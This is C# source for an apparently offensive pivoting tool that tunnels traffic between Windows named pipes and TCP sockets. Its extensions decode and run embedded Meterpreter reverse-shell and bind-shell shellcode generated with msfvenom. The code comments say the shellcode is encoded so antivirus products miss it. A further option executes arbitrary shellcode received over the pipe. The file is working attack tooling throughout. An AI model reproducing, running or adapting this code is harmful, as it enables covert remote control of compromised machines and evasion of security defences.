/// <summary> /// Pipe functions. /// From read pipe to socket /// From socket to write pipe /// </summary> static void ReadPipeToSocket(System.Net.Sockets.NetworkStream networkStream, StreamString ss) { Task.Factory.StartNew(() => { String dataEncoded; byte[] dataDecoded; while (true) { dataEncoded = ss.ReadString(); dataDecoded = Convert.FromBase64String(dataEncoded); if (dataDecoded.Length > 0) { Console.WriteLine("ReadPipeToSocket: Encoded " + dataEncoded.Length + " / Decoded " + dataDecoded.Length); networkStream.Write(dataDecoded, 0, dataDecoded.Length); } } }); }
static void Main(string[] args) { // HANLDE PARAMS if (args.Length < 6) { Console.WriteLine("\nUsage: flatpipes [pipemode] [socketmode] [pipename] [pipeaddr] [ip] [port] [extension]\n"); Console.WriteLine(" pipemode\tTo connect to or create locally a pipe (pserver|pclient)"); Console.WriteLine(" socketmode\tAfter piping, TCP listen or connect (sserver|sclient)"); Console.WriteLine(" pipeaddr\tIP for pipe connection (for local or server use '.')"); Console.WriteLine(" pipename\tPrefix of the two pipes created"); Console.WriteLine(" ip/port\tSocket info to listen on or connect to"); Console.WriteLine(" extension\tMisc tools (revmeter|bindmeter|customhex)"); Environment.Exit(1); } String pmode = args[0]; String smode = args[1]; String pipename = args[2]; String pipeaddr = args[3]; String ip = args[4]; String port = args[5]; String extension = null; if (args.Length == 7) { extension = args[6]; } // Check some unsupported conditions if ((extension != null) && (String.Compare(pmode, "pclient") == 0)) { Console.WriteLine("[*] Extensions are not currently supported on pclient. Use on pserver only."); Environment.Exit(1); } if (String.Compare(smode, "sclient") == 0 && String.Compare(extension, "revmeter") == 0) { Console.WriteLine("[*] Reverse payload on sclient config does not make sense. Use sserver instead."); Environment.Exit(1); } if (String.Compare(smode, "sserver") == 0 && String.Compare(extension, "bindmeter") == 0) { Console.WriteLine("[*] Bind payload on sserver config does not make sense. Use sclient instead."); Environment.Exit(1); } // PRINT ARCHITECTURE if (IntPtr.Size == 4) { Console.WriteLine("[!] Running as 32-bit"); } else if (IntPtr.Size == 8) { Console.WriteLine("[!] Running as 64-bit"); } else { Console.WriteLine("[!] Running in the future"); } // PIPE SERVER IMPLEMENTATION if (String.Compare(pmode, "pserver") == 0) { // Handle pipes (block until connected) Console.WriteLine("[!] Waiting for pipe connections"); var pipe_s2c = new NamedPipeServerStream(pipename + "_s2c", PipeDirection.Out); // Writing to client var pipe_c2s = new NamedPipeServerStream(pipename + "_c2s", PipeDirection.In); // Reading from client pipe_s2c.WaitForConnection(); Console.WriteLine("[!] Client connected on downstream pipe"); pipe_c2s.WaitForConnection(); Console.WriteLine("[!] Client connected on upstream pipe"); StreamString ss_s2c = new StreamString(pipe_s2c); StreamString ss_c2s = new StreamString(pipe_c2s); // Check for extensions execution IntPtr shellcodeProcessHandle = IntPtr.Zero; if (extension != null) { if (String.Compare(extension, "revmeter") == 0 && String.Compare(smode, "sserver") == 0) { Console.WriteLine("[!] Extension " + extension + " starting."); // We pass through encoding to minimize the AV catching popular staged meterpreter strings // Shellcode formatted by msfvenom // Below is: msfvenom --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=54321 -f raw 2>/dev/null | gzip | base64 -w 0 String ShellCode_B64 = "H4sIADgM9VgAA/vzoomBgSGh86nhgZTuAIPuIJ7uIJHuIg3+7V5qhv/X2CTWMOkoHDzPy3j80aeg8O4ggW4vm24fwYrHHowXA7sjFRgvd3tKPLby7DbpZrwG1ABWavGg9Btz7Q/rWpXSJxHdESqMl9O6eby7I2SAqlm6GS90uqioREcnRkYF/n8QHx/VLfS6NzbD2IiBIaO82Cg+JMOnXI39/9UdExgZGDSPhARkaDZkM/y/msWaUc/AwJjBxHDFsPNZABA4AGHGK/77D/5fnZ4lEBaeMXNpSeL/q60HSrj++3GUvnmRCPRbFkMWC1CK6eaJ+P9Xm38w1Jl1m2U5ZDAIMDCEZTFkRCwJfvr/6uTgLIawYCRVtUoRGQwOIN0BGdz6/Ab/r4ZnlOb5Ak2Pi/vPo/Ky8P///4yHNY+VHj+8+8PWRUCTgv9fBQBn+JV+TQEAAA=="; // Decode base64 byte[] ShellCode_gzip = Convert.FromBase64String(ShellCode_B64); // Decompress byte[] ShellCode_c = Decompress(ShellCode_gzip); // "Monkey patch" the port string portHex = Convert.ToInt32(port).ToString("X").ToLower(); if (portHex.Length == 4) { ShellCode_c[181] = Convert.ToByte(portHex.Substring(0, 2), 16); ShellCode_c[182] = Convert.ToByte(portHex.Substring(2, 2), 16); } else if (portHex.Length == 2) { ShellCode_c[181] = 0; ShellCode_c[182] = Convert.ToByte(portHex.Substring(0, 2), 16); } // Execute payload and get returned handle shellcodeProcessHandle = exec_shellcode(ShellCode_c); //WaitForSingleObject(hThread, 0xFFFFFFFF); //Console.WriteLine("[!] Extension " + extension + " 4"); } else if (String.Compare(extension, "bindmeter") == 0 && String.Compare(smode, "sclient") == 0) { Console.WriteLine("[!] Extension " + extension + " starting."); // We pass through encoding to minimize the AV catching popular staged meterpreter strings // Shellcode formatted by msfvenom // Below is: msfvenom --platform windows -p windows/meterpreter/bind_tcp LHOST= LPORT=54321 -f raw 2>/dev/null | gzip | base64 -w 0 String ShellCode_B64 = "H4sIAEoT9VgAA/vzoomBgSGh86nhgZTuAIPuIJ7uIJHuIg3+7V5qhv/X2CTWMOkoHDzPy3j80aeg8O4ggW4vm24fwYrHHowXA7sjFRgvd3tKPLby7DbpZrwG1ABWavGg9Btz7Q/rWpXSJxHdESqMl9O6eby7I2SAqlm6GS90uqioREcnRkYF/n8QHx/VLfS6NzbD2IiBIaO82Cg+JMOnXI39/9UdExgZGDSPhARkaDZkM/y/msUdGfDobxZjFlPGK/77D/5fnZ7BxHDFsPNZlkBYeMah2+bp/6+2HiiNCM/Y/tLi//+r4Rklb6wfAunpGaV5volAAxiyWIAqmW6eiP9/tfkHQ51ut1mWQwaDAANDWBZDRsSS4Kf/r04OzmIIC0ZWxc54WPNY6cvDAFPg4MorAQAA"; // Decode base64 byte[] ShellCode_gzip = Convert.FromBase64String(ShellCode_B64); // Decompress byte[] ShellCode_c = Decompress(ShellCode_gzip); // "Monkey patch" the port string portHex = Convert.ToInt32(port).ToString("X").ToLower(); if (portHex.Length == 4) { ShellCode_c[192] = Convert.ToByte(portHex.Substring(0, 2), 16); ShellCode_c[193] = Convert.ToByte(portHex.Substring(2, 2), 16); } else if (portHex.Length == 2) { ShellCode_c[192] = 0; ShellCode_c[193] = Convert.ToByte(portHex.Substring(0, 2), 16); } // Execute payload and get returned handle shellcodeProcessHandle = exec_shellcode(ShellCode_c); //WaitForSingleObject(hThread, 0xFFFFFFFF); //Console.WriteLine("[!] Extension " + extension + " 4"); } else if (String.Compare(extension, "customhex") == 0) { Console.WriteLine("[!] Extension " + extension + " starting. Waiting payload."); String dataEncoded; byte[] dataDecoded; dataEncoded = ss_c2s.ReadString(); dataDecoded = Convert.FromBase64String(dataEncoded); shellcodeProcessHandle = exec_shellcode(dataDecoded); } } // Handle socket requirements NetworkStream networkStream = null; if (String.Compare(smode, "sclient") == 0) { TcpClient tcpClient = null; bool ok = false; while (!ok) { try { tcpClient = new TcpClient(ip, Convert.ToInt32(port)); ok = true; } catch (Exception ex) { Console.WriteLine("[*] Error while connecting. Trying again in a while.."); Task.Delay(1000).Wait(); } } networkStream = tcpClient.GetStream(); Console.WriteLine("[!] Connected to " + ip + ":" + port); } else if (String.Compare(smode, "sserver") == 0) { TcpListener tcpServer = new TcpListener(IPAddress.Parse(ip), Convert.ToInt32(port)); // Try to start socket listener until no problem occurs bool ok = false; while (!ok) { try { tcpServer.Start(); ok = true; } catch (Exception ex) { Console.WriteLine("[*] Error while listening. Check if port is used. Trying again in a while.."); Task.Delay(1000).Wait(); } } Console.WriteLine("[!] Started listener on " + ip + ":" + port); TcpClient tcpClient = tcpServer.AcceptTcpClient(); Console.WriteLine("[!] Client Connected to socket"); networkStream = tcpClient.GetStream(); } // Start the upstream/downstream handling tasks SocketToWritePipe(networkStream, ss_s2c); ReadPipeToSocket(networkStream, ss_c2s); if (shellcodeProcessHandle != IntPtr.Zero) { Console.WriteLine("[!] Job done. Waiting until shellcode process exits."); WaitForSingleObject(shellcodeProcessHandle, 0xFFFFFFFF); } else { Console.WriteLine("[!] Job done. Waiting forever."); while (true) { } } } // PIPE CLIENT IMPLEMENTATION else if (String.Compare(pmode, "pclient") == 0) { // Handle pipes // Even if pserver is not online, it will block until it opens (seems to wait forever) var pipe_s2c = new NamedPipeClientStream(pipeaddr, pipename + "_s2c", PipeDirection.In, PipeOptions.None); // Reading from server var pipe_c2s = new NamedPipeClientStream(pipeaddr, pipename + "_c2s", PipeDirection.Out, PipeOptions.None); // Writing to server try { pipe_s2c.Connect(); Console.WriteLine("[!] Connected to server's downstream pipe"); pipe_c2s.Connect(); Console.WriteLine("[!] Connected to server's upstream pipe"); } catch (Exception ex) { Console.WriteLine("[*] Error while connecting to pipe. Exiting.."); Environment.Exit(1); } StreamString ss_s2c = new StreamString(pipe_s2c); StreamString ss_c2s = new StreamString(pipe_c2s); // Handle socket requirements NetworkStream networkStream = null; if (String.Compare(smode, "sclient") == 0) { TcpClient tcpClient = null; bool ok = false; while (!ok) { try { tcpClient = new TcpClient(ip, Convert.ToInt32(port)); ok = true; } catch (Exception ex) { Console.WriteLine("[*] Error while connecting. Trying again in a while.."); Task.Delay(1000).Wait(); } } networkStream = tcpClient.GetStream(); Console.WriteLine("[!] Connected to " + ip + ":" + port); } else if (String.Compare(smode, "sserver") == 0) { TcpListener tcpServer = new TcpListener(IPAddress.Parse(ip), Convert.ToInt32(port)); // Try to start socket listener until no problem occurs bool ok = false; while (!ok) { try { tcpServer.Start(); ok = true; } catch (Exception ex) { Console.WriteLine("[*] Error while listening. Check if port is used. Trying again in a while.."); Task.Delay(1000).Wait(); } } Console.WriteLine("[!] Started listener on " + ip + ":" + port); TcpClient tcpClient = tcpServer.AcceptTcpClient(); Console.WriteLine("[!] Client Connected to socket"); networkStream = tcpClient.GetStream(); } // Start the upstream/downstream handling tasks ReadPipeToSocket(networkStream, ss_s2c); SocketToWritePipe(networkStream, ss_c2s); // loop Console.WriteLine("[!] Job done. Waiting forever."); while (true) { } } }
static void SocketToWritePipe(System.Net.Sockets.NetworkStream networkStream, StreamString ss) { Task.Factory.StartNew(() => { byte[] netReadBuffer = new byte[1024]; int charsread = 0; while (true) { if (networkStream.CanRead) { charsread = networkStream.Read(netReadBuffer, 0, 250); String s = Convert.ToBase64String(netReadBuffer, 0, charsread); if (charsread > 0) { Console.WriteLine("SocketToWritePipe: Decoded " + charsread + " / Encoded " + s.Length); ss.WriteString(s); } } } }); }